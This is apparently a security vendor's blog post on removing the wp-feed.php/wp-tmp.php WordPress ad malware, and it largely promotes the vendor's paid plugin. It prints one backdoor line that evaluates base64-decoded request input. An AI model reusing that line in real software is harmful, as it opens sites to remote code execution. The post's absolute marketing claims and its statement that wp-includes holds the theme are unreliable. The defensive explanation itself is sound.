How to Fix wp-feed.php & wp-tmp.php Malware in WordPress?
Is your malware scanner alerting you that “your site is hacked” but it looks fine to you?
Are visitors complaining about spam ads on your WordPress website but you don’t see any?
There is a good chance that your site is hacked.
Hackers find clever ways to disguise their hacks from site owners so that they go undetected and they can continue exploiting the website for a long time.
The wp-feed.php is one of the most cleverly disguised hacks out there.
Hidden from the site owners, it displays ads for illegal products, drugs, and adult content to your visitors.
Even if you were able to detect it, finding all places where the infection has spread to is not only difficult but sometimes impossible. The removal of the infection is complicated and hard. If you do manage to remove it, in 8 out of 10 cases, the infection reappears.
Bottom line: it’s hard to remove a wp-feed.php infection from a WordPress website.
Luckily, we have dealt with this malware countless times before. Over the past decade, we have not only successfully removed wp-feed from hundreds and thousands of WordPress websites, but also prevented reinfections.
Don’t worry. You’re in good hands.
In this article, you’ll learn:
- How wp-feed.php malware operates and how it impacts your website
- How to remove it from your site
- How to prevent reinfections in the future
To remove the wp-feed.php infection, all you just need to do is install our WordPress Malware Removal Plugin and run the Auto-Clean function. The plugin also helps prevent reinfection by:
- Removing website backdoors which enable reinfection
- Blocking malicious traffic from accessing your site with a firewall and login protection.
What is wp-feed.php & wp-tmp.php? (Causes, Symptoms, & Reinfections)
In a nutshell: WP-Feed is a type of malware that displays malicious ads on websites. The goal is to get your visitors to click on the ads and redirect them to a malicious website.
You must be wondering –
> How did my website get infected?
The infection is generally caused by the use of nulled plugins or themes.
Nulled software is tempting to use because they offer you premium features free of cost. Many believe that nulled software is distributed as an act of benevolence.
That’s usually far from the case. Nulled software is distributed so that hackers can gain access to your site effortlessly.
Nulled plugins or themes are teeming with malware. When you install a nulled theme or plugin on your website, you are basically opening doors for hackers to access your site.
Besides nulled software, outdated plugins and themes can also be vulnerable. Hackers exploit these vulnerabilities to break into your site.
They also exploit weak usernames and passwords like “admin” and “p@ssword.” Weak credentials are easy to guess.
A hacker can guess your username and login, and implant the wp-feed.php malware into your website directly.
> Why do hackers infect sites with wp-feed.php?
The goal is to steal your visitors and dupe them into buying fake services or products so that hackers can generate revenue.
What is truly amazing is how they are often able to achieve this without the site owner getting a single hint.
Which brings us to the question –
> Why is it hard to notice the symptoms of this infection?
Once hackers gain access to your website, they implant two files (wp-feed.php & wp-tmp.php) into your wp-includes folder.
The wp-includes folder is part of your WordPress core. It’s where the theme of your website is located.
The WP feed file starts infecting other WordPress files, especially function.php, which is part of your active theme.
From within function.php, hackers are able to display malicious popup ads on your WordPress website.
The really diabolical part though is that the ads are only shown to new visitors, not repeat visitors. The malware records visitors to your site to ensure that only new visitors are shown the ads. This is an ingenious way to prevent detection.
Hence you, as a frequent visitor to your own site, never notice any symptom of a hack.
How to Clean wp-feed.php Malware?
There are two ways of removing the infection. Those are –
1. Using a plugin (easy)
2. Doing it manually (difficult)
Let’s dive into each method.
1. Removing WP-Feed.php Malware With a Plugin (easy way)
Some of you may already have a security plugin installed on your website. It was probably this plugin that alerted you about the malicious files – wp-includes/wp-feed.php and wp-includes/wp-tmp.php.
Most security plugins offer malware removal services, but very few can do it quickly and as effectively as MalCare Security.
- MalCare will clean your site under 60 seconds. You don’t have to raise a ticket. You don’t have to wait in a queue. You don’t have to hand over your site’s credentials to a 3rd party plugin.
- Not just that, the plugin goes above and beyond into every nook and cranny, looking for hidden malware. It finds every single malicious script present on your site.
- It uses non-traditional methods to detect new and well-hidden malware. It thoroughly analyzes the behavior of code to identify malicious intent. This also helps to ensure that it’s not marking good code as bad.
- It does all of that within the span of a few minutes.
Let’s clean wp-feed.php infection with MalCare.
Step 1: Install and activate MalCare Security on your WordPress website.
Step 2: From your dashboard menu, select MalCare. Enter your email address and click on Secure Site Now.
Step 3: On the next page, you’ll be asked to enter a password, and then to enter your URL.
MalCare will start scanning your website immediately. The purpose is to find every single instance of malicious code present on your website.
This means, it will not just detect the wp-feed.php and wp-tmp.php files, but all the malicious code infecting your WordPress files, including the instances hiding in the function.php file.
You can rest assured that the plugin will also find every single backdoor present on your site, so as to prevent reinfections.
Upon finding the malicious scripts, the plugin will alert you about it.
Next, you need to clean your site.
Please note that MalCare’s malware removal is a premium feature. It’s the only instant malware removal plugin out there. For $99 a year, you can clean a single site as many times as you want, and be sure of the best protection you can possibly have. Learn more about MalCare Pricing.
Step 4: To remove every single trace of wp-feed.php from your website, all you need to do is click on the Auto-Clean button.
MalCare will start cleaning your site instantly.
That’s it, folks. That’s how you clean your website with a plugin.
2. Manually Remove WP-Feed.php Malware (difficult way)
Manually removing the infection is fairly challenging, because, in this type of infection, there are a lot of moving pieces.
- The hacker uploads two malicious files – wp-feed.php & wp-tmp.php. You need to remove them to start. This is probably the only easy bit.
- The infection is spread across to other WordPress files, including the function.php file. This is hard, because who is to say where the infection has spread.
- It’ll take you hours to find all the malicious code.
- Recognizing the malicious code is difficult because they are well-disguised and look like normal pieces of code.
- Some known malicious code, like “eval(base64_decode)”, can be part of legitimate plugins. They are not used in a malicious way. Hence, deleting the code will affect your plugin and may even break your site.
- There is a fairly good chance that you will miss pieces of code that may lead to reinfections.
Manual removal, therefore, is not at all effective.
However, if you still want to do it, please take a complete backup of your website. If you end up deleting something accidentally and breaking your site, you can quickly restore it to normal.
Here’s a list of the best backup services you can opt for.
And here’s an article that’ll help you remove the malware manually – WordPress hacked. Just jump to the “How to Clean a Hacked WordPress Website Manually” section.
Your website is free of infection now, but it’s far from secure. Hackers can still target your site and attempt to infect it. You need to ensure that your site is protected from future infection. But before we get into that, let’s have a look at the impact of wp-feed.php & wp-tmp.php infection.
Impact of wp-temp.php Malware Infection
Needless to say that the presence of wp-feed.php & wp-tmp.php malware can have a devastating impact on your website.
Websites that have been infected with wp-temp.php will often suffer the following consequences:
- You will notice a jump in the bounce rate and a decline in the time visitors spend on your website.
- Popup ads will make your website heavy and really slow.
- No one likes a slow website, so visitors are likely to hit the back button before your pages load on the browser. This will have a domino effect.
- Search engines will notice how quickly people are leaving your site. They will conclude that you are not offering what users are searching for. Your search engine ranking will fall.
- This means all the effort, time, and money you might have spent to rank higher in the SERPs is wasted.
- Hacked websites are blacklisted by Google and suspended by hosting providers. Also, if the hacked sites are running google ads, then adwords account will be suspended. All this will lead to further dip into traffic.
- Moreover, hacked websites have to be cleaned which can be an expensive affair, if you are not using the right tools.
The good news is that you know that your site is hacked. Therefore you can clean it and stop the impact.
How to Protect Your Site From wp-feed.php Malware in the Future?
Many of our readers may have tried removing the wp-feed.php malware from their sites, only to discover that the malware keeps returning.
This happens because there is a backdoor installed on your site. Most backdoors are extremely well disguised, so much so that they can be passed over as legitimate code by amateur developers.
In a previous section, we explained that hackers insert two files, wp-feed.php & wp-tmp.php, into your website code. The wp-tmp.php file acts as a backdoor. If you open the file, you will find a script that looks something like this –
$p = $REQUEST$#91;”m”]; eval(base64_decode ($p));
The good news is that you can protect your site from future hack attempts by taking the following measures –
1. Delete Nulled Software & Stop Using Them
If you are using a nulled plugin or theme on your website, delete it immediately.
Hackers gained access to your site using nulled software in the first place. No matter how well you clean your site, if you don’t remove nulled software, hackers will find their way into your site and implant malware.
If you have given your users permission to install plugins and themes, ensure that they never use nulled software.
In fact, it is better to practice to prevent the installation of plugins and themes altogether with the help of MalCare.
All you need to do is log into MalCare’s dashboard, select your website, click on Apply Hardening, and enable Block Plugin/Theme Installation.
2. Harden Your Site Security
You can prevent hackers from implanting malicious files like wp-feed.php into your WordPress folders by changing file permissions.
File permissions are a set of rules that determine who can access which files. You can block users from making modifications to the wp-includes folder. To understand file permissions in greater depth, check out this guide: WordPress File Permissions.
You can also block hackers from modifying your theme by disabling the file editor. This will prevent them from injecting pop-up ads on your website. You can do it manually but it’s risky and not recommended.
If you have MalCare already installed on your site, all you need to do is click a button to disable the file editor.
Learn more about WordPress hardening.
3. Keep Your Website Updated
Just like any other software, WordPress plugins, and themes develop vulnerabilities. When developers learn about this vulnerability, they quickly create a patch and release it in the form of an update.
If there is any delay in implementing updates, it puts your site at risk.
Hackers are good at exploiting vulnerabilities. In fact, they are always on the lookout for websites with vulnerabilities so that they can use it to gain access to the site and infect the site with malware.
Hence, never delay updates.
You can learn more about security updates from here – WordPress Security Updates.
Here’s a guide that’ll help you keep your site updated – How to Update WordPress.
4. Enforce The Use of Strong Credentials
The easiest way to gain access to your website is via your login page.
The hacker just needs to successfully guess your user credentials. In fact, they design bots that can try out hundreds of usernames and passwords combinations within the span of a few minutes. If you or any of your teammates are using easy-to-guess credentials like “admin” and “password123,” it’ll take the bots 2 seconds to breach your site. This is called a brute force attack.
It’s important to ensure that every user of your website uses unique usernames and strong passwords.
You can even go beyond this and implement several measures to protect your login page. We have compiled a list of WordPress login security measures that you can take.
5. Use a Firewall
Wouldn’t it be great if you could prevent hackers from even landing on your website in the first place?
A firewall is just the tool you need.
It investigates the traffic that wants to gain access to your site. If it detects that the traffic originates from a malicious IP address, the firewall promptly blocks the traffic.
In this way, it filters out hackers and bots.
Here’s a list of the best WordPress firewalls you can activate on your site.
However, if you are using MalCare, then you already have a firewall activated on your site.
We have shown you how to clean your site and how to ensure that you are never hacked again.
A piece of advice that we think will save your website from a number of disasters is – take regular backups of your website.
Whether your website is suddenly throwing an error or it’s broken, a backup will help you quickly fix your site temporarily.
If you subscribe to MalCare Security, you can also avail of a backup addon for an extra charge. Get in touch with us to learn more.
Give MalCare Security Plugin a Spin!
Sufia is a WordPress enthusiast, and enjoys sharing their experience with fellow enthusiasts. On the MalCare blog, Sufia distils the wisdom gained from building plugins to solve security issues that admins face.